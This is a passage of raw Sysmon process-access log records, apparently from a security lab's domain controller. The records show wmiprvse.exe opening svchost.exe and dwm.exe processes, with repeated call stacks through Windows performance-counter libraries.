116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007931Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007930Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007929Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007928Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007927Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007926Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007925Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007924Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007923Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007922Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007921Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007920Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007919Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007918Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007917Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007916Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007915Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 